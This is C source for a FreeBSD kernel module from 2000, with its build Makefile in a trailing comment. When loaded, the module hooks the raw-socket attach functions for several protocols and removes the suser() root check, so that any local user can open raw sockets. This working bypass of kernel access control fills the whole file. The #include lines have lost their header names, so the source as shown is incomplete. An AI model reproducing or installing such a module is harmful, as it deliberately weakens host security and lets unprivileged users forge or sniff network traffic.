/* * Name: SRaw for FreeBSD ( sock.c ) * Date: Mon May 01 13:12:43 2000 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ] * * SoftProject 2000 - Digital Sekurity for Y2k * Sikurezza.org - Italian Security MailingList * * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by * Poul-Henning Kamp but you can give me in return a coffee. * * Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #5: Mon Mar i386 * * All users are allowed to open raw sockets... * This kld disables EPERM in socket() and permits to allocate inpcb even if * the socket is raw and users haven't root permissions... bypassing suser() * in pru_attach() functions... * * * Idea & Code for Linux by Gigi_Sull * Code for FreeBSD by pIGpEN / S0ftPj */ #include #include #include #include #include #include #include #include #include #include #include #include #include extern struct protosw inetsw[]; extern struct inpcbinfo ripcbinfo; static int rip_attach __P((struct socket *, int, struct proc *)); static int (*old_rip_attach) __P((struct socket *, int, struct proc *)); static int module_handler __P((module_t, int, void *)); #define attach(x) inetsw[ip_protox[x]].pr_usrreqs->pru_attach static int module_handler(module_t mod, int cmd, void *arg) { int s; switch(cmd) { case MOD_LOAD: s = splnet(); old_rip_attach = attach(IPPROTO_RAW); attach(IPPROTO_RAW) = rip_attach; attach(IPPROTO_ICMP) = rip_attach; attach(IPPROTO_IGMP) = rip_attach; attach(IPPROTO_RSVP) = rip_attach; attach(IPPROTO_IPIP) = rip_attach; attach(IPPROTO_IDP) = rip_attach; attach(0) = rip_attach; splx(s); break; case MOD_UNLOAD: s = splnet(); attach(IPPROTO_RAW) = old_rip_attach; attach(IPPROTO_ICMP) = old_rip_attach; attach(IPPROTO_IGMP) = old_rip_attach; attach(IPPROTO_RSVP) = old_rip_attach; attach(IPPROTO_IPIP) = old_rip_attach; attach(IPPROTO_IDP) = old_rip_attach; attach(0) = old_rip_attach; splx(s); break; } return 0; } static moduledata_t s_raw = { "S_Raw", module_handler, NULL }; DECLARE_MODULE(S_Raw, s_raw, SI_SUB_PSEUDO, SI_ORDER_ANY); static u_long rip_sendspace = 8192; /* RIPSNDQ */ static u_long rip_recvspace = 8192; /* RIPRCVQ */ static int rip_attach(struct socket *so, int proto, struct proc *p) { struct inpcb *inp; int error, s; inp = sotoinpcb(so); if (inp) panic("rip_attach"); /* * We don't want suser() call * * if (p && (error = suser(p->p_ucred, &p->p_acflag)) != 0) * return error; */ s = splnet(); error = in_pcballoc(so, &ripcbinfo, p); splx(s); if (error) return error; error = soreserve(so, rip_sendspace, rip_recvspace); if (error) return error; inp = (struct inpcb *)so->so_pcb; inp->inp_ip_p = proto; return 0; } /* # SoftProject 2000 - Digital Sekurity for Y2k # Sikurezza.org - Italian Security MailingList # # COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by # Poul-Henning Kamp but you can give me in return a coffee. # # Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #3: Thu Mar i386 # < pigpen@s0ftpj.org > .PATH: /sys/kern SRCS = sock.c CFLAGS+= -I/sys KMOD = sock NOMAN = t KLDMOD = t KLDLOAD = /sbin/kldload KLDUNLOAD = /sbin/kldunload CLEANFILES+= ${KMOD} load: ${KLDLOAD} -v ./${KMOD} unload: ${KLDUNLOAD} -v -n ${KMOD} .include */